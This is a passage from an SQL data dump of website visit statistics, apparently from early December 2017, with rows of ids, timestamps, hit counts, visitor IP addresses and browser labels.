168.43.7','other'),(183974,1512186944,2,2,0,0,'207.46.13.143','other'),(183975,1512187214,1,1,0,0,'70.173.156.236','chrome'),(183976,1512187219,1,1,0,0,'66.249.64.29','chrome'),(183977,1512187683,1,1,0,0,'91.196.178.65','chrome'),(183978,1512187984,1,1,0,0,'91.196.177.144','chrome'),(183979,1512188203,1,1,0,0,'87.71.148.126','chrome'),(183980,1512188443,1,1,0,0,'91.196.178.134','chrome'),(183981,1512188480,1,1,0,0,'46.211.130.121','chrome'),(183982,1512188716,1,1,0,0,'178.239.1.224','other'),(183983,1512188819,1,1,0,0,'130.180.218.199','other'),(183984,1512189303,1,1,0,0,'194.183.179.232','other'),(183985,1512189399,1,1,0,0,'91.196.177.163','chrome'),(183986,1512190086,1,1,0,0,'178.154.171.88','other'),(183987,1512190100,1,1,0,0,'95.134.185.43','chrome'),(183988,1512190231,1,1,0,0,'91.196.178.162','chrome'),(183989,1512190268,1,1,0,0,'141.8.142.74','other'),(183990,1512190319,1,1,0,0,'91.196.178.54','chrome'),(183991,1512190371,1,1,0,0,'46.211.204.23','chrome'),(183992,1512190376,1,1,0,0,'212.90.61.112','other'),(183993,1512190691,2,2,0,0,'217.69.134.178','other'),(183994,1512190768,1,1,0,0,'217.69.134.200','other'),(183995,1512190859,1,1,0,0,'217.69.133.3','other'),(183996,1512190950,1,1,0,0,'37.55.225.100','chrome'),(183997,1512191031,1,1,0,0,'157.55.39.253','other'),(183998,1512191426,1,1,0,0,'108.161.131.240','chrome'),(183999,1512191444,1,1,0,0,'37.52.114.205','other'),(184000,1512191550,1,1,0,0,'91.196.178.56','chrome'),(184001,1512191975,1,1,0,0,'178.95.156.215','chrome'),(184002,1512192000,1,1,0,0,'217.69.134.160','other'),(184003,1512192004,1,1,0,0,'217.69.134.183','other'),(184004,1512192009,1,1,0,0,'217.69.134.200','other'),(184005,1512192019,1,1,0,0,'217.69.134.227','other'),(184006,1512192023,1,1,0,0,'217.69.133.5','other'),(184007,1512192048,1,0,1,0,'68.180.229.52',''),(184008,1512192120,1,1,0,0,'109.251.77.17','other'),(184009,1512192231,2,2,0,0,'141.8.142.74','other'),(184010,1512192309,2,2,0,0,'217.69.134.220','other'),(184011,1512192423,1,1,0,0,'91.196.178.98','chrome'),(184012,1512192458,1,1,0,0,'217.69.133.3','other'),(184013,1512192555,1,1,0,0,'91.196.178.65','chrome'),(184014,1512192628,1,1,0,0,'91.196.178.68','chrome'),(184015,1512192782,1,1,0,0,'213.111.95.217','other'),(184016,1512192855,1,1,0,0,'217.69.134.161','other'),(184017,1512192932,1,1,0,0,'37.73.217.29','chrome'),(184018,1512193313,1,1,0,0,'66.102.9.25','chrome'),(184019,1512193344,1,1,0,0,'217.69.134.183','other'),(184020,1512193389,1,1,0,0,'217.69.133.3','other'),(184021,1512193408,1,1,0,0,'91.196.178.103','other'),(184022,1512193423,1,1,0,0,'217.69.134.182','other'),(184023,1512193624,1,1,0,0,'37.73.229.66','chrome'),(184024,1512193923,1,1,0,0,'91.196.178.68','chrome'),(184025,1512193975,1,0,1,0,'66.249.64.28',''),(184026,1512194378,1,1,0,0,'217.69.133.224','other'),(184027,1512194494,1,1,0,0,'91.196.178.130','chrome'),(184028,1512194568,1,1,0,0,'104.34.81.146','other'),(184029,1512194759,1,1,0,0,'46.133.217.211','chrome'),(184030,1512194941,1,1,0,0,'37.73.238.127','chrome'),(184031,1512194966,1,1,0,0,'46.219.54.199','other'),(184032,1512194978,1,1,0,0,'141.8.142.74','other'),(184033,1512195095,1,1,0,0,'91.196.178.45','other'),(184034,1512195160,1,1,0,0,'178.154.171.88','other'),(184035,1512195234,1,1,0,0,'188.146.99.111','other'),(184036,1512195519,1,1,0,0,'217.69.133.6','other'),(184037,1512195541,1,1,0,0,'217.69.134.160','other'),(184038,1512195568,1,1,0,0,'217.69.134.175','other'),(184039,1512195588,1,1,0,0,'217.69.133.3','other'),(184040,1512195629,1,1,0,0,'217.69.134.154','other'),(184041,1512195651,1,1,0,0,'91.214.84.116','chrome'),(184042,1512195721,1,1,0,0,'217.69.134.182','other'),(184043,1512195760,1,0,1,0,'66.249.64.29',''),(184044,1512195907,1,1,0,0,'92.249.115.111','other'),(184045,1512195960,1,1,0,0,'46.48.13.161','chrome'),(184046,1512195974,1,1,0,0,'217.69.133.5','other'),(184047,1512196225,1,1,0,0,'217.69.134.161','other'),(184048,1512196259,1,1,0,0,'91.196.178.97','chrome'),(184049,1512196304,1,1,0,0,'95.158.49.11','other'),(184050,1512196420,1,1,0,0,'91.196.178.35','chrome'),(184051,1512196533,1,1,0,0,'37.73.254.251','chrome'),(184052,1512196639,1,1,0,0,'91.196.178.163','chrome'),(184053,1512196718,1,1,0,0,'46.133.188.198','chrome'),(184054,1512196840,1,1,0,0,'217.69.133.235','other'),(184055,1512196888,1,1,0,0,'8.29.198.27','other'),(184056,1512196997,1,1,0,0,'217.69.133.18','other'),(184057,1512197192,1,1,0,0,'93.171.241.65','other'),(184058,1512197193,1,1,0,0,'46.211.97.170','chrome'),(184059,1512197224,2,2,0,0,'141.8.142.74','other'),(184060,1512197289,1,1,0,0,'91.196.178.103','chrome'),(184061,1512197517,1,1,0,0,'46.211.157.19','chrome'),(184062,1512197631,1,1,0,0,'91.233.90.168','chrome'),(184063,1512197637,1,1,0,0,'46.211.98.253','chrome'),(184064,1512197641,1,1,0,0,'178.94.235.63','other'),(184065,1512197693,1,1,0,0,'37.115.129.248','chrome'),(184066,1512197759,1,1,0,0,'46.211.158.188','chrome'),(184067,1512197872,1,1,0,0,'93.72.8.121','other'),(184068,1512198063,1,1,0,0,'46.101.41.206','chrome'),(184069,1512198111,1,1,0,0,'91.196.178.162','other'),(184070,1512198244,1,1,0,0,'5.29.132.172','chrome'),(184071,1512198262,1,1,0,0,'46.211.98.61','other'),(184072,1512198289,1,1,0,0,'91.196.178.168','chrome'),(184073,1512198577,1,1,0,0,'91.196.178.135','other'),(184074,1512198668,1,1,0,0,'79.135.197.240','other'),(184075,1512198680,1,1,0,0,'46.211.99.78','chrome'),(184076,1512198753,1,1,0,0,'91.196.178.164','other'),(184077,1512199023,1,1,0,0,'37.73.240.180','chrome'),(184078,1512200024,1,1,0,0,'178.154.171.88','other'),(184079,1512200093,1,1,0,0,'95.158.38.46','other'),(184080,1512200106,1,1,0,0,'95.134.170.201','chrome'),(184081,1512200172,1,1,0,0,'46.48.13.161','chrome'),(184082,1512200304,2,2,0,0,'54.165.59.7','other'),(184083,1512200438,1,1,0,0,'37.57.230.211','chrome'),(184084,1512200837,1,1,0,0,'95.132.22.163','chrome'),(184085,1512200913,1,1,0,0,'37.55.57.49','chrome'),(184086,1512201167,1,1,0,0,'195.114.136.179','other'),(184087,1512201243,2,2,0,0,'91.196.178.66','other'),(184088,1512201571,1,1,0,0,'207.46.13.143','other'),(184089,1512201712,1,1,0,0,'37.52.19.117','chrome'),(184090,1512201956,1,1,0,0,'37.57.225.104','other'),(184091,1512202002,1,1,0,0,'207.46.13.79','other'),(184092,1512202196,2,2,0,0,'46.211.24.95','chrome'),(184093,1512202219,1,1,0,0,'54.165.59.7','other'),(184094,1512202281,1,1,0,0,'93.74.244.218','other'),(184095,1512202321,1,1,0,0,'62.216.63.143','other'),(184096,1512202333,1,1,0,0,'83.10.164.183','other'),(184097,1512202457,1,1,0,0,'37.55.225.221','chrome'),(184098,1512202740,1,1,0,0,'109.86.35.199','firefox'),(184099,1512202830,1,1,0,0,'91.230.187.26','other'),(184100,1512203025,1,1,0,0,'193.110.22.228','chrome'),(184101,1512203058,1,1,0,0,'185.11.28.141','chrome'),(184102,1512203416,1,1,0,0,'91.196.178.39','firefox'),(184103,1512203476,1,1,0,0,'217.69.136.207','other'),(184104,1512203504,1,1,0,0,'46.133.12.201','chrome'),(184105,1512203594,1,1,0,0,'46.211.120.98','chrome'),(184106,1512203691,1,1,0,0,'95.134.170.144','chrome'),(184107,1512203983,1,1,0,0,'93.74.244.218','other'),(184108,1512204109,1,1,0,0,'176.11.232.113','other'),(184109,1512204162,1,1,0,0,'213.174.6.220','chrome'),(184110,1512204229,1,0,1,0,'66.249.64.28',''),(184111,1512204319,1,1,0,0,'46.211.98.171','chrome'),(184112,1512204379,1,1,0,0,'46.201.168.190','chrome'),(184113,1512204416,1,1,0,0,'193.178.187.66','other'),(184114,1512204432,1,1,0,0,'46.201.168.190','other'),(184115,1512204541,1,1,0,0,'130.180.217.172','other'),(184116,1512204545,1,1,0,0,'207.46.13.79','other'),(184117,1512204576,1,1,0,0,'91.196.177.104','other'),(184118,1512204756,1,1,0,0,'213.108.43.92','other'),(184119,1512204762,1,1,0,0,'93.73.207.168','other'),(184120,1512204805,1,1,0,0,'37.55.57.49','chrome'),(184121,1512205124,1,1,0,0,'217.69.136.210','other'),(184122,1512205233,1,1,0,0,'91.196.178.67','other'),(184123,1512205238,1,1,0,0,'46.211.156.191','other'),(184124,1512205523,1,1,0,0,'37.73.238.162','other'),(184125,1512205690,1,1,0,0,'141.8.142.74','other'),(184126,1512205720,1,1,0,0,'46.211.122.206','other'),(184127,1512205971,1,1,0,0,'31.173.86.252','other'),(184128,1512206017,1,1,0,0,'178.154.171.88','other'),(184129,1512206053,1,1,0,0,'37.55.57.49','chrome'),(184130,1512206218,1,1,0,0,'188.166.72.50','other'),(184131,1512206232,1,1,0,0,'91.196.178.70','chrome'),(184132,1512206572,1,1,0,0,'93.171.243.6','other'),(184133,1512206856,1,1,0,0,'54.165.59.7','other'),(184134,1512206948,1,1,0,0,'217.69.133.192','other'),(184135,1512207039,1,1,0,0,'46.211.24.77','chrome'),(184136,1512207254,1,1,0,0,'37.142.162.41','chrome'),(184137,1512207718,1,1,0,0,'8.29.198.26','other'),(184138,1512208143,1,1,0,0,'95.132.59.134','chrome'),(184139,1512208151,1,1,0,0,'178.154.171.88','other'),(184140,1512208279,1,1,0,0,'46.201.113.130','chrome'),(184141,1512208312,2,2,0,0,'54.165.59.7','other'),(184142,1512208359,1,1,0,0,'91.196.178.166','other'),(184143,1512208453,1,1,0,0,'46.133.250.136','other'),(184144,1512208670,13,13,0,0,'107.150.37.99','other'),(184145,1512208729,10,10,0,0,'107.150.37.100','other'),(184146,1512208840,1,1,0,0,'46.211.67.230','chrome'),(184147,1512208955,1,1,0,0,'31.43.147.74','other'),(184148,1512208966,1,1,0,0,'91.196.178.161','chrome'),(184149,1512208973,1,1,0,0,'91.196.178.69','other'),(184150,1512209232,1,1,0,0,'173.252.84.118','other'),(184151,1512209261,1,1,0,0,'165.227.142.252','chrome'),(184152,1512209426,1,1,0,0,'178.154.171.88','other'),(184153,1512209502,1,1,0,0,'91.196.178.101','chrome'),(184154,1512209820,2,2,0,0,'167.114.1.124','other'),(184155,1512209917,1,1,0,0,'37.55.57.49','chrome'),(184156,1512209990,1,1,0,0,'91.196.178.163','other'),(184157,1512210827,1,1,0,0,'188.191.106.155','chrome'),(184158,1512210927,1,1,0,0,'213.226.195.196','chrome'),(184159,1512211120,1,1,0,0,'46.183.103.8','other'),(184160,1512211524,1,1,0,0,'180.76.15.11','other'),(184161,1512211536,1,1,0,0,'178.62.225.67','other'),(184162,1512212082,1,1,0,0,'92.112.203.37','other'),(184163,1512212158,2,2,0,0,'178.154.171.88','other'),(184164,1512212230,1,1,0,0,'46.133.7.112','other'),(184165,1512212288,1,1,0,0,'195.20.4.31','chrome'),(184166,1512212345,1,1,0,0,'217.69.133.220','other'),(184167,1512212384,1,1,0,0,'91.196.178.67','chrome'),(184168,1512212398,1,1,0,0,'141.8.142.74','other'),(184169,1512212556,1,1,0,0,'207.46.13.79','other'),(184170,1512212569,1,1,0,0,'37.73.250.15','chrome'),(184171,1512212819,1,1,0,0,'46.211.104.156','chrome'),(184172,1512213222,1,1,0,0,'157.55.39.253','other'),(184173,1512213376,1,0,1,0,'66.249.64.29',''),(184174,1512213449,1,1,0,0,'46.211.6.135','chrome'),(184175,1512213922,1,1,0,0,'91.196.178.133','other'),(184176,1512213948,1,1,0,0,'141.8.142.74','other'),(184177,1512214874,1,1,0,0,'37.73.216.255','chrome'),(184178,1512214877,2,2,0,0,'178.154.171.88','other'),(184179,1512214897,1,1,0,0,'134.249.83.167','chrome'),(184180,1512214944,1,1,0,0,'193.53.83.21','chrome'),(184181,1512214955,1,0,1,0,'66.249.64.29',''),(184182,1512215356,1,1,0,0,'185.26.183.11','chrome'),(184183,1512215583,1,1,0,0,'178.94.236.43','chrome'),(184184,1512215837,1,1,0,0,'91.196.178.59','chrome'),(184185,1512216033,1,1,0,0,'178.154.171.88','other'),(184186,1512216244,1,0,1,0,'66.249.64.28',''),(184187,1512216751,1,1,0,0,'199.30.24.217','other'),(184188,1512216889,1,1,0,0,'37.73.163.176','chrome'),(184189,1512217181,1,1,0,0,'46.211.153.4','other'),(184190,1512217479,1,0,1,0,'66.249.64.29',''),(184191,1512218032,1,1,0,0,'37.73.215.104','chrome'),(184192,1512218045,1,1,0,0,'91.196.178.163','chrome'),(184193,1512218553,1,1,0,0,'8.29.198.25','other'),(184194,1512218852,1,1,0,0,'46.211.248.9','other'),(184195,1512218955,1,1,0,0,'46.211.100.97','other'),(184196,1512218979,1,1,0,0,'141.8.142.74','other'),(184197,1512219009,1,1,0,0,'46.201.175.246','chrome'),(184198,1512219069,1,1,0,0,'180.76.15.6','other'),(184199,1512219147,1,1,0,0,'195.154.146.17','other'),(184200,1512219234,3,3,0,0,'91.196.178.66','chrome'),(184201,1512220056,2,2,0,0,'141.8.142.74','other'),(184202,1512220171,2,2,0,0,'37.73.246.99','chrome'),(184203,1512220418,3,3,0,0,'37.73.235.96','other'),(184204,1512220431,1,1,0,0,'46.48.13.161','chrome'),(184205,1512220541,1,1,0,0,'91.196.178.101','chrome'),(184206,1512221069,1,1,0,0,'180.76.15.33','other'),(184207,1512221198,1,1,0,0,'37.73.193.156','chrome'),(184208,1512221240,1,1,0,0,'217.69.133.246','other'),(184209,1512221278,1,1,0,0,'37.73.254.89','other'),(184210,1512221334,1,1,0,0,'216.244.66.237','other'),(184211,1512221383,1,1,0,0,'178.154.171.88','other'),(184212,1512221549,1,1,0,0,'37.73.170.226','chrome'),(184213,1512221654,1,1,0,0,'141.8.142.74','other'),(184214,1512221671,2,2,0,0,'91.196.178.52','chrome'),(184215,1512221865,1,1,0,0,'91.196.179.138','chrome'),(184216,1512222049,1,1,0,0,'195.66.141.200','other'),(184217,1512222477,1,1,0,0,'37.73.254.185','chrome'),(184218,1512222485,1,1,0,0,'91.196.178.55','chrome'),(184219,1512222793,1,1,0,0,'107.167.107.64','other'),(184220,1512222843,1,1,0,0,'91.196.177.74','other'),(184221,1512222948,1,1,0,0,'178.92.8.118','chrome'),(184222,1512223075,1,1,0,0,'95.133.238.251','chrome'),(184223,1512223121,1,1,0,0,'217.69.133.224','other'),(184224,1512224533,2,2,0,0,'92.112.104.77','chrome'),(184225,1512224660,1,1,0,0,'130.180.210.53','chrome'),(184226,1512225534,1,1,0,0,'99.22.28.236','other'),(184227,1512225643,1,1,0,0,'178.92.74.54','chrome'),(184228,1512225797,1,1,0,0,'188.146.197.103','chrome'),(184229,1512225819,1,1,0,0,'79.110.131.115','other'),(184230,1512225930,1,1,0,0,'87.250.224.46','other'),(184231,1512226461,1,0,1,0,'66.249.64.28',''),(184232,1512227277,1,1,0,0,'91.196.178.133','chrome'),(184233,1512227674,1,1,0,0,'107.167.116.55','other'),(184234,1512227912,1,1,0,0,'178.154.171.88','other'),(184235,1512228070,1,1,0,0,'91.196.178.161','chrome'),(184236,1512228111,1,1,0,0,'141.8.142.74','other'),(184237,1512228624,1,1,0,0,'82.145.221.249','chrome'),(184238,1512229150,1,1,0,0,'178.154.171.88','other'),(184239,1512229191,1,1,0,0,'91.204.92.130','chrome'),(184240,1512229212,1,0,1,0,'66.249.64.30',''),(184241,1512229277,1,1,0,0,'37.73.228.169','chrome'),(184242,1512229380,1,1,0,0,'8.29.198.25','other'),(184243,1512229613,1,1,0,0,'91.196.178.130','chrome'),(184244,1512229774,1,1,0,0,'46.133.208.237','other'),(184245,1512230025,1,1,0,0,'217.69.133.247','other'),(184246,1512230170,1,1,0,0,'217.69.133.18','other'),(184247,1512230221,1,1,0,0,'91.196.178.102','chrome'),(184248,1512230234,1,1,0,0,'91.196.178.44','chrome'),(184249,1512230342,1,1,0,0,'188.163.16.131','other'),(184250,1512230388,1,1,0,0,'37.55.58.59','chrome'),(184251,1512230591,1,1,0,0,'92.113.127.37','chrome'),(184252,1512230813,1,1,0,0,'37.73.200.40','chrome'),(184253,1512230824,1,1,0,0,'46.211.121.0','chrome'),(184254,1512231028,1,1,0,0,'195.10.210.49','other'),(184255,1512231451,1,1,0,0,'91.196.178.163','chrome'),(184256,1512231554,1,1,0,0,'141.8.142.74','other'),(184257,1512231731,1,1,0,0,'46.211.69.196','chrome'),(184258,1512231767,1,0,1,0,'66.249.64.28',''),(184259,1512231788,2,2,0,0,'91.196.178.161','other'),(184260,1512232038,1,1,0,0,'95.134.169.252','chrome'),(184261,1512232565,1,1,0,0,'188.166.73.249','chrome'),(184262,1512232617,1,1,0,0,'176.8.146.169','chrome'),(184263,1512232623,1,1,0,0,'195.122.197.98','other'),(184264,1512232710,1,1,0,0,'178.154.171.88','other'),(184265,1512233270,1,1,0,0,'91.196.178.58','chrome'),(184266,1512233515,1,1,0,0,'46.133.235.206','chrome'),(184267,1512233776,1,1,0,0,'91.196.178.7','chrome'),(184268,1512233848,1,1,0,0,'95.67.80.108','chrome'),(184269,1512234034,1,1,0,0,'95.132.115.92','chrome'),(184270,1512234132,1,1,0,0,'185.11.28.134','other'),(184271,1512234135,1,1,0,0,'91.196.178.68','other'),(184272,1512234361,1,1,0,0,'46.211.149.65','other'),(184273,1512235801,1,1,0,0,'91.196.178.161','chrome'),(184274,1512236304,1,1,0,0,'91.196.178.168','firefox'),(184275,1512236571,1,1,0,0,'107.167.107.78','other'),(184276,1512236590,1,1,0,0,'46.133.233.59','other'),(184277,1512236734,1,1,0,0,'46.211.5.116','chrome'),(184278,1512236840,1,1,0,0,'141.8.142.74','other'),(184279,1512237588,1,1,0,0,'80.91.183.164','other'),(184280,1512237897,1,1,0,0,'195.66.141.200','other'),(184281,1512238185,1,1,0,0,'46.211.117.233','chrome'),(184282,1512238542,1,1,0,0,'37.57.247.117','other'),(184283,1512238607,1,1,0,0,'66.249.70.25','chrome'),(184284,1512238740,1,1,0,0,'91.124.181.54','chrome'),(184285,1512238827,1,1,0,0,'217.69.133.230','other'),(184286,1512238884,1,1,0,0,'91.196.178.71','chrome'),(184287,1512238914,1,1,0,0,'91.196.178.134','other'),(184288,1512238967,1,1,0,0,'37.73.196.196','chrome'),(184289,1512239076,1,1,0,0,'31.43.113.240','other'),(184290,1512239100,1,1,0,0,'193.107.74.152','other'),(184291,1512239265,1,1,0,0,'198.37.118.36','firefox'),(184292,1512239654,1,1,0,0,'91.196.178.136','other'),(184293,1512239740,1,1,0,0,'46.133.251.34','chrome'),(184294,1512240066,27,27,0,0,'95.67.80.108','chrome'),(184295,1512240211,1,1,0,0,'8.29.198.26','other'),(184296,1512240363,1,1,0,0,'89.102.252.80','chrome'),(184297,1512240908,1,1,0,0,'178.154.171.88','other'),(184298,1512240910,1,1,0,0,'141.8.142.74','other'),(184299,1512241449,1,1,0,0,'91.196.178.167','chrome'),(184300,1512241472,1,1,0,0,'91.196.178.59','chrome'),(184301,1512241739,1,1,0,0,'37.54.23.193','chrome'),(184302,1512242025,1,1,0,0,'46.211.115.202','chrome'),(184303,1512242029,1,1,0,0,'95.135.88.177','chrome'),(184304,1512242492,1,1,0,0,'92.242.116.132','other'),(184305,1512242718,1,1,0,0,'193.110.22.228','other'),(184306,1512242863,1,1,0,0,'178.251.109.148','other'),(184307,1512243612,1,1,0,0,'31.130.21.252','chrome'),(184308,1512243781,1,1,0,0,'91.196.178.167','chrome'),(184309,1512243862,1,1,0,0,'217.69.133.243','other'),(184310,1512243879,1,1,0,0,'178.154.171.88','other'),(184311,1512244062,1,1,0,0,'46.201.175.246','other'),(184312,1512244108,1,1,0,0,'207.46.13.143','other'),(184313,1512244111,1,1,0,0,'162.210.196.98','other'),(184314,1512244261,1,1,0,0,'46.242.116.243','msie'),(184315,1512244634,1,1,0,0,'193.194.127.223','chrome'),(184316,1512244682,1,1,0,0,'37.53.227.10','chrome'),(184317,1512245085,1,1,0,0,'213.179.252.101','chrome'),(184318,1512245099,1,1,0,0,'93.171.241.65','other'),(184319,1512245249,1,1,0,0,'195.69.222.18','other'),(184320,1512245707,1,1,0,0,'109.86.118.178','other'),(184321,1512245954,1,1,0,0,'212.22.199.28','chrome'),(184322,1512246463,1,1,0,0,'24.114.45.178','other'),(184323,1512246824,1,1,0,0,'91.203.136.61','firefox'),(184324,1512246840,1,1,0,0,'91.196.178.71','chrome'),(184325,1512247243,1,1,0,0,'207.46.13.79','other'),(184326,1512247332,1,1,0,0,'31.172.140.164','other'),(184327,1512247872,1,1,0,0,'91.196.178.103','other'),(184328,1512247994,1,1,0,0,'37.53.227.243','other'),(184329,1512248322,1,1,0,0,'37.73.223.33','chrome'),(184330,1512248582,1,1,0,0,'91.196.178.65','chrome'),(184331,1512250154,1,1,0,0,'93.72.115.97','other'),(184332,1512250187,1,1,0,0,'91.232.158.8','chrome'),(184333,1512250206,1,1,0,0,'198.37.118.36','firefox'),(184334,1512250509,1,1,0,0,'91.196.178.60','chrome'),(184335,1512251038,1,1,0,0,'8.29.198.27','other'),(184336,1512251778,1,0,1,0,'66.249.64.30',''),(184337,1512251853,1,1,0,0,'217.69.136.207','other'),(184338,1512252306,1,1,0,0,'217.69.133.250','other'),(184339,1512252546,48,48,0,0,'95.67.80.108','chrome'),(184340,1512252818,1,1,0,0,'91.232.158.8','chrome'),(184341,1512253124,1,1,0,0,'91.196.178.67','chrome'),(184342,1512253460,42,42,0,0,'95.67.80.108','chrome'),(184343,1512253767,1,1,0,0,'46.211.156.111','other'),(184344,1512254434,45,45,0,0,'95.67.80.108','chrome'),(184345,1512254491,1,1,0,0,'107.167.107.36','other'),(184346,1512255334,1,1,0,0,'109.251.188.44','other'),(184347,1512255345,5,5,0,0,'95.67.80.108','chrome'),(184348,1512255411,1,1,0,0,'109.63.186.2','chrome'),(184349,1512256179,1,1,0,0,'217.69.133.28','other'),(184350,1512256753,1,1,0,0,'91.196.178.70','chrome'),(184351,1512256969,1,1,0,0,'93.73.105.198','other'),(184352,1512259178,1,1,0,0,'216.244.66.237','other'),(184353,1512259761,1,1,0,0,'46.242.79.114','msie'),(184354,1512259969,1,1,0,0,'217.69.133.252','other'),(184355,1512260485,1,1,0,0,'217.69.133.230','other'),(184356,1512261018,1,1,0,0,'75.27.31.88','chrome'),(184357,1512261818,1,1,0,0,'128.72.209.245','msie'),(184358,1512261873,1,1,0,0,'8.29.198.26','other'),(184359,1512263556,1,1,0,0,'91.124.82.143','other'),(184360,1512263898,1,1,0,0,'192.162.115.62','chrome'),(184361,1512264665,1,1,0,0,'91.196.177.8','other'),(184362,1512264676,1,1,0,0,'141.8.142.74','other'),(184363,1512264738,1,1,0,0,'198.200.99.165','firefox'),(184364,1512264855,1,0,1,0,'66.249.70.25',''),(184365,1512265006,1,1,0,0,'217.69.133.225','other'),(184366,1512265040,1,1,0,0,'176.38.170.130','other'),(184367,1512265844,1,1,0,0,'180.76.15.149','other'),(184368,1512266609,1,1,0,0,'141.8.142.74','other'),(184369,1512267076,7,7,0,0,'46.229.168.80','other'),(184370,1512267102,4,4,0,0,'46.229.168.75','other'),(184371,1512267117,4,4,0,0,'46.229.168.69','other'),(184372,1512267132,11,11,0,0,'46.229.168.71','other'),(184373,1512267153,13,13,0,0,'46.229.168.67','other'),(184374,1512267214,3,3,0,0,'46.229.168.73','other'),(184375,1512267239,12,12,0,0,'46.229.168.79','other'),(184376,1512267302,8,8,0,0,'46.229.168.66','other'),(184377,1512267315,4,4,0,0,'46.229.168.77','other'),(184378,1512267365,8,8,0,0,'46.229.168.76','other'),(184379,1512267446,1,1,0,0,'217.69.133.192','other'),(184380,1512267687,1,1,0,0,'178.154.171.88','other'),(184381,1512267740,10,10,0,0,'46.229.168.68','other'),(184382,1512267912,9,9,0,0,'46.229.168.70','other'),(184383,1512268051,1,1,0,0,'217.69.133.217','other'),(184384,1512268090,6,6,0,0,'46.229.168.69','other'),(184385,1512268114,9,9,0,0,'46.229.168.80','other'),(184386,1512268178,7,7,0,0,'46.229.168.71','other'),(184387,1512268215,10,10,0,0,'46.229.168.66','other'),(184388,1512268232,1,1,0,0,'46.229.168.73','other'),(184389,1512268250,4,4,0,0,'46.229.168.79','other'),(184390,1512268368,6,6,0,0,'46.229.168.76','other'),(184391,1512268530,6,6,0,0,'46.229.168.77','other'),(184392,1512268611,9,9,0,0,'46.229.168.78','other'),(184393,1512268696,5,5,0,0,'46.229.168.68','other'),(184394,1512268941,6,6,0,0,'46.229.168.70','other'),(184395,1512269133,10,10,0,0,'46.229.168.73','other'),(184396,1512269157,2,2,0,0,'46.229.168.80','other'),(184397,1512269294,4,4,0,0,'46.229.168.67','other'),(184398,1512269344,8,8,0,0,'46.229.168.66','other'),(184399,1512269391,12,12,0,0,'46.229.168.76','other'),(184400,1512269499,5,5,0,0,'46.229.168.69','other'),(184401,1512269537,9,9,0,0,'46.229.168.78','other'),(184402,1512269594,1,1,0,0,'40.77.167.60','other'),(184403,1512269601,11,11,0,0,'46.229.168.68','other'),(184404,1512269628,11,11,0,0,'46.229.168.71','other'),(184405,1512269684,3,3,0,0,'46.229.168.79','other'),(184406,1512269903,1,1,0,0,'87.250.224.46','other'),(184407,1512269953,6,6,0,0,'46.229.168.70','other'),(184408,1512270043,8,8,0,0,'46.229.168.77','other'),(184409,1512270231,3,3,0,0,'46.229.168.75','other'),(184410,1512270257,4,4,0,0,'46.229.168.66','other'),(184411,1512270293,4,4,0,0,'46.229.168.80','other'),(184412,1512270319,6,6,0,0,'46.229.168.67','other'),(184413,1512270512,4,4,0,0,'46.229.168.76','other'),(184414,1512270533,8,8,0,0,'46.229.168.73','other'),(184415,1512270582,11,11,0,0,'46.229.168.68','other'),(184416,1512270665,8,8,0,0,'46.229.168.79','other'),(184417,1512270753,4,4,0,0,'46.229.168.71','other'),(184418,1512270774,6,6,0,0,'46.229.168.78','other'),(184419,1512270881,3,3,0,0,'46.229.168.70','other'),(184420,1512271048,8,8,0,0,'46.229.168.77','other'),(184421,1512271198,5,5,0,0,'46.229.168.69','other'),(184422,1512271341,6,6,0,0,'46.229.168.66','other'),(184423,1512271437,9,9,0,0,'46.229.168.67','other'),(184424,1512271490,4,4,0,0,'46.229.168.80','other'),(184425,1512271515,8,8,0,0,'46.229.168.76','other'),(184426,1512271523,5,5,0,0,'46.229.168.75','other'),(184427,1512271637,9,9,0,0,'46.229.168.73','other'),(184428,1512271643,1,1,0,0,'93.172.73.46','firefox'),(184429,1512271745,2,2,0,0,'46.229.168.68','other'),(184430,1512271811,5,5,0,0,'46.229.168.71','other'),(184431,1512271850,4,4,0,0,'46.229.168.70','other'),(184432,1512271929,4,4,0,0,'46.229.168.79','other'),(184433,1512272022,3,3,0,0,'46.229.168.78','other'),(184434,1512272084,4,4,0,0,'46.229.168.77','other'),(184435,1512272091,1,1,0,0,'192.166.117.238','other'),(184436,1512272283,1,1,0,0,'141.8.142.74','other'),(184437,1512272333,4,4,0,0,'46.229.168.69','other'),(184438,1512272337,5,5,0,0,'46.229.168.66','other'),(184439,1512272391,9,9,0,0,'46.229.168.80','other'),(184440,1512272423,8,8,0,0,'46.229.168.76','other'),(184441,1512272532,7,7,0,0,'46.229.168.75','other'),(184442,1512272596,6,6,0,0,'46.229.168.67','other'),(184443,1512272666,7,7,0,0,'46.229.168.73','other'),(184444,1512272707,1,1,0,0,'8.29.198.26','other'),(184445,1512272845,9,9,0,0,'46.229.168.68','other'),(184446,1512272889,5,5,0,0,'46.229.168.79','other'),(184447,1512272987,1,1,0,0,'141.8.132.19','other'),(184448,1512272989,1,1,0,0,'37.9.113.115','other'),(184449,1512273003,6,6,0,0,'46.229.168.77','other'),(184450,1512273037,1,1,0,0,'46.48.13.161','chrome'),(184451,1512273114,9,9,0,0,'46.229.168.70','other'),(184452,1512273273,9,9,0,0,'46.229.168.69','other'),(184453,1512273473,7,7,0,0,'46.229.168.80','other'),(184454,1512273520,3,3,0,0,'46.229.168.78','other'),(184455,1512273533,1,1,0,0,'46.229.168.71','other'),(184456,1512273654,7,7,0,0,'46.229.168.67','other'),(184457,1512273674,5,5,0,0,'46.229.168.76','other'),(184458,1512273733,8,8,0,0,'46.229.168.73','other'),(184459,1512273868,4,4,0,0,'46.229.168.66','other'),(184460,1512273928,5,5,0,0,'46.229.168.77','other'),(184461,1512273935,4,4,0,0,'46.229.168.79','other'),(184462,1512274038,5,5,0,0,'46.229.168.70','other'),(184463,1512274086,6,6,0,0,'46.229.168.68','other'),(184464,1512274457,15,15,0,0,'46.229.168.75','other'),(184465,1512274545,4,4,0,0,'46.229.168.69','other'),(184466,1512274546,2,2,0,0,'46.229.168.71','other'),(184467,1512274600,5,5,0,0,'46.229.168.78','other'),(184468,1512274664,6,6,0,0,'46.229.168.67','other'),(184469,1512274749,5,5,0,0,'46.229.168.76','other'),(184470,1512274772,4,4,0,0,'46.229.168.66','other'),(184471,1512274782,1,1,0,0,'178.154.171.88','other'),(184472,1512274862,7,7,0,0,'46.229.168.73','other'),(184473,1512274902,10,10,0,0,'46.229.168.80','other'),(184474,1512274913,1,1,0,0,'46.229.168.79','other'),(184475,1512275138,8,8,0,0,'46.229.168.77','other'),(184476,1512275163,2,2,0,0,'46.229.168.68','other'),(184477,1512275190,2,2,0,0,'46.229.168.70','other'),(184478,1512275481,3,3,0,0,'46.229.168.75','other'),(184479,1512275498,1